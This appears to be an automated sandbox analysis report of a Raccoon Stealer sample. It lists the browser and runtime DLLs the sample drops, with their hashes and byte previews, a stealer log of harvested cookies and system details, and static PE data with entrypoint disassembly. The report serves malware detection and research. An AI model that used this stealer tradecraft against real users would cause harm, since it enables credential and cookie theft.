SHA-512:	5C78C5482E589AF7D609318A6705824FD504136AEAAC63F373E913DA85FA03AF868669534496217B05D74364A165D7E08899437FCC0E3017F02D94858BA814BB
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........9..j..j..j...j..j^..k..j^..k..j^..k..j^..k..j...k..j..j..jL..k..jL..k..jL.bj..jL..k..jRich..j........................PE..L....<.\.........."!................Y........0...............................p......r.....@..........................5.......6.......P..x............2.......`..x....0..T...........................(1..@............0...............................text............................... ..`.rdata.......0......................@..@.data........@.......&..............@....rsrc...x....P.......,..............@..@.reloc..x....`.......0..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\lgpllibs.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	55760
Entropy (8bit):	6.738700405402967
Encrypted:	false
SSDEEP:	1536:LxsBS3Q6j+37mWT7DT/GszGrn7iBCmjFCOu:LxTBcmWT7X/Gszen7icmjFtu
MD5:	56E982D4C380C9CD24852564A8C02C3E
SHA1:	F9031327208176059CD03F53C8C5934C1050897F
SHA-256:	7F93B70257D966EA1C1A6038892B19E8360AADD8E8AE58E75EBB0697B9EA8786
SHA-512:	92ADC4C905A800F8AB5C972B166099382F930435694D5F9A45D1FDE3FEF94FAC57FD8FAFF56FFCFCFDBC61A43E6395561B882966BE0C814ECC7E672C67E6765A
Malicious:	false
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...........l...l...l.......l..~....l..9...l..~....l..~....l..~....l.......l..l....l...l...l...l...l..l....l..l....l..l....l..l..l..l....l..Rich.l..........................PE..L...z@.\.........."!.........2......................................................t.....@...........................................x...............................T...............................@............................................text.............................. ..`.rdata..>...........................@..@.data...............................@....rodata.8...........................@..@.rsrc...x...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\libEGL.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22480
Entropy (8bit):	6.528357540966124
Encrypted:	false
SSDEEP:	384:INZ9mLVDAffJJKAtn0mLAb8X3FbvDG8A3OPLonzvGb:4mx+fXvn4YFrDG8MKb
MD5:	96B879B611B2BBEE85DF18884039C2B8
SHA1:	00794796ACAC3899C1FB9ABBF123FEF3CC641624
SHA-256:	7B9FC6BE34F43D39471C2ADD872D5B4350853DB11CC66A323EF9E0C231542FB9
SHA-512:	DF8F1AA0384A5682AE47F212F3153D26EAFBBF12A8C996428C3366BEBE16850D0BDA453EC5F4806E6A62C36D312D37B8BBAFF549968909415670C9C61A6EC49A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...N{.N{.N{.6..N{.F,z.N{.F,x.N{.F,~.N{.F,..N{..z.N{.T-z.N{.Nz..N{.T-~.N{.T-{.N{.T-..N{.T-y.N{.Rich.N{.........................PE..L...aA.\.........."!.........(............... ...............................p......~.....@..........................%..........d....P..x............:.......`.......!..T............................"..@............ ...............................text... ........................... ..`.rdata....... ......................@..@.data........@.......2..............@....rsrc...x....P.......4..............@..@.reloc.......`.......8..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83408
Entropy (8bit):	6.436278889454398
Encrypted:	false
SSDEEP:	1536:CNr03+TtFKytqB0EeCsu1sW+cdQOTki9jHiU:CNrDKHBBjXQSki9OU
MD5:	385A92719CC3A215007B83947922B9B5
SHA1:	38DE6CA70CEE1BAD84BED29CE7620A15E6ABCD10
SHA-256:	06EF2010B738FBE99BCDEBBF162473A4EE090678BB6862EEB0D4C7A8C3F225BB
SHA-512:	9F0DFF00C7E72D7017AECE3FA5C31A9C2C2AA0CCC6606D2561CE8D36A4A1F0AB8DC452E2C65E9F4B6CD32BBB8ADA1FF7C865126A5F318719579DB763E4C4183F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........mR;...;...;.......2.......G.......).......*.......".......4.......>...;...n.......:.......:.......:.......:...Rich;...........................PE..L....=.\.........."!.........................................................`......>.....@.............................l.......<....@..P............(.......P..d...0...T...............................@............................................text............................... ..`.rdata..Z[.......\..................@..@.data........ ......................@....rsrc...P....@......................@..@.reloc..d....P......................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32_InUse.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83408
Entropy (8bit):	6.436278889454398
Encrypted:	false
SSDEEP:	1536:CNr03+TtFKytqB0EeCsu1sW+cdQOTki9jHiU:CNrDKHBBjXQSki9OU
MD5:	385A92719CC3A215007B83947922B9B5
SHA1:	38DE6CA70CEE1BAD84BED29CE7620A15E6ABCD10
SHA-256:	06EF2010B738FBE99BCDEBBF162473A4EE090678BB6862EEB0D4C7A8C3F225BB
SHA-512:	9F0DFF00C7E72D7017AECE3FA5C31A9C2C2AA0CCC6606D2561CE8D36A4A1F0AB8DC452E2C65E9F4B6CD32BBB8ADA1FF7C865126A5F318719579DB763E4C4183F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........mR;...;...;.......2.......G.......).......*.......".......4.......>...;...n.......:.......:.......:.......:...Rich;...........................PE..L....=.\.........."!.........................................................`......>.....@.............................l.......<....@..P............(.......P..d...0...T...............................@............................................text............................... ..`.rdata..Z[.......\..................@..@.data........ ......................@....rsrc...P....@......................@..@.reloc..d....P......................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozglue.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	137168
Entropy (8bit):	6.784614237836286
Encrypted:	false
SSDEEP:	3072:Z6s2DIGLXlNJJcPoN0j/kVqhp1qt/TXTv7q1D2JJJvPhrSeXZ5dR:MszGLXlNrE/kVqhp12/TXTjSD2JJJvPt
MD5:	EAE9273F8CDCF9321C6C37C244773139
SHA1:	8378E2A2F3635574C106EEA8419B5EB00B8489B0
SHA-256:	A0C6630D4012AE0311FF40F4F06911BCF1A23F7A4762CE219B8DFFA012D188CC
SHA-512:	06E43E484A89CEA9BA9B9519828D38E7C64B040F44CDAEB321CBDA574E7551B11FEA139CE3538F387A0A39A3D8C4CBA7F4CF03E4A3C98DB85F8121C2212A9097
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;..;..;.....;.W....;...8..;...?..;...:..;...>..;...:...;..:.w.;...?..;...>..;...;..;......;...9..;.Rich.;.........................PE..L...{>.\.........."!.....z...................................................@......j.....@A........................@...t.......,.... ..x....................0..l.......T...................T.......h...@...................l........................text....x.......z.................. ..`.rdata..^e.......f...~..............@..@.data...............................@....didat..8...........................@....rsrc...x.... ......................@..@.reloc..l....0......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\msvcp140.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	440120
Entropy (8bit):	6.652844702578311
Encrypted:	false
SSDEEP:	12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
MD5:	109F0F02FD37C84BFC7508D4227D7ED5
SHA1:	EF7420141BB15AC334D3964082361A460BFDB975
SHA-256:	334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
SHA-512:	46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nss3.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1245136
Entropy (8bit):	6.766715162066988
Encrypted:	false
SSDEEP:	24576:ido5Js2a56/+VwJebKj5KYFsRjzx5ZxKV6D1Z4Go/LCiytoxq2Zwn5hCM4MSRdY8:Q2aY4w6aozx5ZWMM7yew8MSRK1y
MD5:	02CC7B8EE30056D5912DE54F1BDFC219
SHA1:	A6923DA95705FB81E368AE48F93D28522EF552FB
SHA-256:	1989526553FD1E1E49B0FEA8036822CA062D3D39C4CAB4A37846173D0F1753D5
SHA-512:	0D5DFCF4FB19B27246FA799E339D67CD1B494427783F379267FB2D10D615FFB734711BAB2C515062C078F990A44A36F2D15859B1DACD4143DCC35B5C0CEE0EF5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c.4.'.Z.'.Z.'.Z.....3.Z...[.%.Z.B..#.Z...Y.*.Z..._.-.Z...^.,.Z...[./.Z..[.$.Z.'.[...Z..^.-.Z..Z.&.Z...&.Z..X.&.Z.Rich'.Z.........................PE..L....@.\.........."!.........................................................@......Q.....@................................x=..T.......p........................\|......T...........................h...@............................................text............................... ..`.rdata...Q.......R..................@..@.data...tG...`..."...>..............@....rsrc...p............`..............@..@.reloc...\|.......~...d..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssckbi.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	336336
Entropy (8bit):	7.0315399874711995
Encrypted:	false
SSDEEP:	6144:8bndzEL04gF85K9autIMyEhZ/V3psPyHa9tBe1:8bndzEL04pnutIMyAp2z9tBe1
MD5:	BDAF9852F588C86B055C846B53D4C144
SHA1:	03B739430CF9EADE21C977B5B416C4DD94528C3B
SHA-256:	2481DA1C459A2429A933D19AD6AE514BD2AE59818246DDB67B0EF44146CED3D8
SHA-512:	19D9A952A3DF5703542FA52A5A780C2E04D6A132059F30715954EAC40CD1C3F3B119A29736D4A911BE85086AFE08A54A7482FA409DFD882BAC39037F9EECD7EF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pi.Pi.Pi.(..Pi.F2h.Pi.F2j.Pi.F2l.Pi.F2m.Pi.0h.Pi.T3h.Pi.Ph.Pi.T3m.Pi.T3i.Pi.T3..Pi.T3k.Pi.Rich.Pi.........PE..L....@.\.........."!.........`......q........................................@...........@.............................P.......d.......x.......................t)..p...T..............................@............................................text.............................. ..`.rdata..>...........................@..@.data....N.......L..................@....rsrc...x...........................@..@.reloc..t).......*..................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssdbm3.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	92624
Entropy (8bit):	6.639527605275762
Encrypted:	false
SSDEEP:	1536:YvNGVOt0VjOJkbH8femxfRVMNKBDuOQWL1421GlkxERC+ANcFZoZ/6tNRCwI41Pc:+NGVOiBZbcGmxXMcBqmzoCUZoZebHPAT
MD5:	94919DEA9C745FBB01653F3FDAE59C23
SHA1:	99181610D8C9255947D7B2134CDB4825BD5A25FF
SHA-256:	BE3987A6CD970FF570A916774EB3D4E1EDCE675E70EDAC1BAF5E2104685610B0
SHA-512:	1A3BB3ECADD76678A65B7CB4EBE3460D0502B4CA96B1399F9E56854141C8463A0CFCFFEDF1DEFFB7470DDFBAC3B608DC10514ECA196D19B70803FBB02188E15E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Z.Y.4.Y.4.Y.4.P...U.4...5.[.4..y.Q.4...7.X.4...1.S.4...0.R.4.{.5.[.4...5.Z.4.Y.5...4...0.A.4...4.X.4....X.4...6.X.4.RichY.4.........................PE..L....@.\.........."!.........0...............0......................................*q....@......................... ?......(@.......`..x............L.......p.......:..T...........................(;..@............0..X............................text............................... ..`.rdata..D....0... ..................@..@.data........P.......>..............@....rsrc...x....`.......@..............@..@.reloc.......p.......D..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\pB4pD1lB4sD3.zip Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	2828315
Entropy (8bit):	7.998625956067725
Encrypted:	true
SSDEEP:	49152:tiGLaX5/cgbRETlc0EqgSVAx07XZiEi4qiefeEJGt5ygL0+6/qax:t9OX9alwJSVP1fnefekGt5CP
MD5:	1117CD347D09C43C1F2079439056ADA3
SHA1:	93C2CE5FC4924314318554E131CFBCD119F01AB6
SHA-256:	4CFADA7EB51A6C0CB26283F9C86784B2B2587C59C46A5D3DC0F06CAD2C55EE97
SHA-512:	FC3F85B50176C0F96898B7D744370E2FF0AA2024203B936EB1465304C1C7A56E1AC078F3FDF751F4384536602F997E745BFFF97F1D8FF2288526883185C08FAF
Malicious:	false
Preview:	PK.........znN<..{r....i......nssdbm3.dll...\|...8...N..Y..6.$J.....$1...D .a.....jL.V..C...N.;....}./............$...Z,T.R.qc...Ec.=................;..{..s....p.`..A.?M.....W!.....a..?N...~e.A..W.o.....[.}...,...;.+\....Jw.\|...k.......<yR.^.E.o.nxs.c...=V....,..F....cu.....w.O..[..u.{..<.w....7P...{..K~..E..w...c...z^..[Z....6.G.V.2..+.n4......1M.......w{f..nJL..{. d......M..+.. ......./.)..$X!......L..K.`.M...w.I..LA8r.IX...r...87..}........<.].r.....TWm......b6/._....a..W.lB...3.n.._...j....o.Mz.._Q........8....K............gr..L..H...v....6[...4I...{.1g..<..>M..$G.&Y........-.....O..9\...,t..W.m.X ..Y.3....S<#}.".>.0RBg,...lh.s..o.....r.p8...)..3..K.v....ds.n3.+]....+....krMu._.Y\..../8T......&.BC.".u..;..e.k u$......~`.{.!.M...\W.Y.37+nQ.Z.*...3\G..5d....Z.hVL..Z.\|k.5...XF.Y..lVVW..C..\|.....b..\.Z...m. ..0...P.F8{].U.p..RW,n...MM.....s..._@..>Q.. ...N.>.T?WM....)9B.............mVW.......b.6{..\|!......O....M....>.>.$\.%..L.zF.l...3

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\prldap60.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	24016
Entropy (8bit):	6.532540890393685
Encrypted:	false
SSDEEP:	384:TQJMOeAdiNcNUO3qgpw6MnTmJk0llEEHAnDl3vDG8A3OPLondJJs2z:KMaNqb6MTmVllEK2p/DG8MlsQ
MD5:	6099C438F37E949C4C541E61E88098B7
SHA1:	0AD03A6F626385554A885BD742DFE5B59BC944F5
SHA-256:	46B005817868F91CF60BAA052EE96436FC6194CE9A61E93260DF5037CDFA37A5
SHA-512:	97916C72BF75C11754523E2BC14318A1EA310189807AC8059C5F3DC1049321E5A3F82CDDD62944EA6688F046EE02FF10B7DDF8876556D1690729E5029EA414A9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:`wq[.$q[.$q[.$x#.$s[.$.9.%s[.$.9.%p[.$.9.%{[.$.9.%z[.$S;.%s[.$.8.%t[.$q[.$=[.$.8.%t[.$.8.%p[.$.8.$p[.$.8.%p[.$Richq[.$........PE..L....@.\.........."!..... ... .......%.......0...............................p......./....@..........................5......p7..x....P..x............@.......`..$...`1..T............................1..@............0..,............................text...2........ .................. ..`.rdata.......0.......$..............@..@.data...4....@.......4..............@....rsrc...x....P.......8..............@..@.reloc..$....`.......<..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\qipcap.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	16336
Entropy (8bit):	6.437762295038996
Encrypted:	false
SSDEEP:	192:aPgr1ZCb2vGJ7b20qKvFej7x0KDWpH3vUA397Ae+PjPonZwC7Qm:aYpZPGJP209F4vDG8A3OPLonZwC7X
MD5:	F3A355D0B1AB3CC8EFFCC90C8A7B7538
SHA1:	1191F64692A89A04D060279C25E4779C05D8C375
SHA-256:	7A589024CF0EEB59F020F91BE4FE7EE0C90694C92918A467D5277574AC25A5A2
SHA-512:	6A9DB921156828BCE7063E5CDC5EC5886A13BD550BA8ED88C99FA6E7869ECFBA0D0B7953A4932EB8381243CD95E87C98B91C90D4EB2B0ACD7EE87BE114A91A9E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s6.7W..7W..7W..>/..5W...5..5W...5..6W...5..>W...5..<W...7..4W..7W..*W...4..6W...4`.6W...4..6W..Rich7W..................PE..L....B.\.........."!......................... ...............................`.......r....@..................................$..P....@..x............".......P.. .... ..T............................ ..@............ ..h............................text...P........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...x....@......................@..@.reloc.. ....P....... ..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\softokn3.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	144848
Entropy (8bit):	6.54005414297208
Encrypted:	false
SSDEEP:	3072:8Af6suip+I7FEk/oJz69sFaXeu9CoT2nIVFetBW3D2xkEMk:B6POsF4CoT2OeYMzMk
MD5:	4E8DF049F3459FA94AB6AD387F3561AC
SHA1:	06ED392BC29AD9D5FC05EE254C2625FD65925114
SHA-256:	25A4DAE37120426AB060EBB39B7030B3E7C1093CC34B0877F223B6843B651871
SHA-512:	3DD4A86F83465989B2B30C240A7307EDD1B92D5C1D5C57D47EFF287DC9DAA7BACE157017908D82E00BE90F08FF5BADB68019FFC9D881440229DCEA5038F61CD6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....@.\.........."!.........b...............................................P.......\|....@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ucrtbase.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142072
Entropy (8bit):	6.809041027525523
Encrypted:	false
SSDEEP:	24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
MD5:	D6326267AE77655F312D2287903DB4D3
SHA1:	1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
SHA-256:	0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
SHA-512:	11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E..............o........p..................................................................Rich............................PE..L....3............!.....Z...........=.......p...............................p............@A........................`................................0..8=......$... ...T...........................H...@............................................text....Z.......Z.................. ..`.data........p.......^..............@....idata..6............l..............@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\vcruntime140.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83784
Entropy (8bit):	6.890347360270656
Encrypted:	false
SSDEEP:	1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
MD5:	7587BF9CB4147022CD5681B015183046
SHA1:	F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
SHA-256:	C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
SHA-512:	0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\yH9tY9hO9gL5 Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	1084
Entropy (8bit):	5.2886724639304905
Encrypted:	false
SSDEEP:	24:m9S+XkuCH/j3eJy6U3NetfMGTBqhKQa72CGik/R8RA2Tvqzh:eS5L3v3NetkKBg7CGik/R0A+0h
MD5:	AA845D677F1B588DC1E35088D7C6E9B1
SHA1:	EABAD2BBDEA867A472AC46C50909932DACBFF13E
SHA-256:	5BFF514CEFCC1696C49B32487A8F84042104F06C574288DFF74A336F2CEC217C
SHA-512:	15438D895AAC8D7F81A6C2E0348F66A7D6DF74835C28D1F50AFD6384DD2188F834142742F30E5A8327D111B3CE6B670B38BE5B844ED8C27B0697EA7E1DF71BE4
Malicious:	false
Preview:	RACCOON STEALER \| 1.8.1...Build compile date: Wed Sep 8 00:01:38 2021...Launched at: 2021.09.28 - 08:25:11 GMT...Bot_ID: D06ED635-68F6-4E9A-955C-4899F5F57B9A_user...Running on a desktop......-------------...... - Cookies: 1... - Passwords: 0... - Files: 0......System Information:... - System Language: English... - System TimeZone: -8 hrs... - IP: 185.189.150.72... - Location: 47.366402, 8.554600 \| Zurich, Zurich, Switzerland (8001)... - ComputerName: 549163... - Username: user... - Windows version: NT 10.0... - Product name: Windows 10 Pro... - System arch: x64... - CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (4 cores)... - RAM: 8191 MB (5436 MB used)... - Screen resolution: 1280x1024... - Display devices:....0) Microsoft Basic Display Adapter......-------------......Installed Apps: ....Adobe Acrobat Reader DC (19.012.20035)....Google Chrome (85.0.4183.121)....Google Update Helper (1.3.35.451)....Java 8 Update 211 (8.0.2110.12)....Java Auto Updater (2.8.211.12)....Up

\Device\Null Download File
Process:	C:\Windows\SysWOW64\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Category:	dropped
Size (bytes):	92
Entropy (8bit):	4.300553674183507
Encrypted:	false
SSDEEP:	3:hYFEHgARcWmFsFJQZtctFst3g4t32vov:hYFE1mFSQZi3MXt3X
MD5:	F74899957624A2837F2F86E8E62E92D4
SHA1:	1FCDAC5DEC5B0B1E00CF0247DA2A5F18566F1431
SHA-256:	507992A303C447D1D40D36E2E5163A237077B94F23A7089AC90A2F08682AE9BC
SHA-512:	E3FD14728633614B6552A75C15079AC8B04C0E8B3F49535B522C73312B1C812E30A934099AB18B507A0B4878068987D5545E90FA3747F7E7B10360EE324DB435
Malicious:	false
Preview:	..Waiting for 10 seconds, press CTRL+C to quit ..... 9.. 8.. 7.. 6.. 5.. 4.. 3.. 2.. 1.. 0..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.729757571355875
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Clipper DOS Executable (2020/12) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File size:	448000
MD5:	e283621cd5dea00d95791a88eecda925
SHA1:	c1fca8da67debe3d9d67cf6def926d81c8bb3350
SHA256:	2becdf23ad63dfcb341ee332fa50623f0cf5e4fa5f0c6c854cd4e59ce8be3ce6
SHA512:	631940951d1dd4973ab416238275a932719816103b2f8ef279a6eed4ace923ebefd15a87e792a866034aae28399aeb9af6811aaccbb4f680c178674feccc874e
SSDEEP:	12288:BPJd+0j6UAtiX9FtdA4Jf/5mdS5Mu3RVmBqx:BPa8tdA4ZPLR
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................PE..L..

File Icon


Icon Hash:	e0e4e8beb0c4c8ea

Static PE Info

General
Entrypoint:	0x401b18
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x5E8A04AA [Sun Apr 5 16:17:46 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	006a79ea8a61231651632116bf97f2d7

Entrypoint Preview

Instruction
call 00007FD2D0FCF930h
jmp 00007FD2D0FCCD3Dh
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
xor ecx, ecx
cmp eax, dword ptr [0045D008h+ecx*8]
je 00007FD2D0FCCED5h
inc ecx
cmp ecx, 2Dh
jc 00007FD2D0FCCEB3h
lea ecx, dword ptr [eax-13h]
cmp ecx, 11h
jnbe 00007FD2D0FCCED0h
push 0000000Dh
pop eax
pop ebp
ret
mov eax, dword ptr [0045D00Ch+ecx*8]
pop ebp
ret
add eax, FFFFFF44h
push 0000000Eh
pop ecx
cmp ecx, eax
sbb eax, eax
and eax, ecx
add eax, 08h
pop ebp
ret
call 00007FD2D0FCF595h
test eax, eax
jne 00007FD2D0FCCEC8h
mov eax, 0045D170h
ret
add eax, 08h
ret
call 00007FD2D0FCF582h
test eax, eax
jne 00007FD2D0FCCEC8h
mov eax, 0045D174h
ret
add eax, 0Ch
ret
mov edi, edi
push ebp
mov ebp, esp
push esi
call 00007FD2D0FCCEA7h
mov ecx, dword ptr [ebp+08h]
push ecx
mov dword ptr [eax], ecx
call 00007FD2D0FCCE47h
pop ecx
mov esi, eax
call 00007FD2D0FCCE81h
mov dword ptr [eax], esi
pop esi
pop ebp
ret
push 0000000Ch
push 0045B5D8h
call 00007FD2D0FCDC4Ch
mov ecx, dword ptr [ebp+08h]
xor edi, edi
cmp ecx, edi
jbe 00007FD2D0FCCEF0h
push FFFFFFE0h
pop eax
xor edx, edx
div ecx
cmp eax, dword ptr [ebp+0Ch]
sbb eax, eax
inc eax
jne 00007FD2D0FCCEE1h
call 00007FD2D0FCCE53h
mov dword ptr [eax], 0000000Ch
push edi
push edi
push edi

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x5c1a0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5b92c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xe3000	0x10bd0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x591c0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
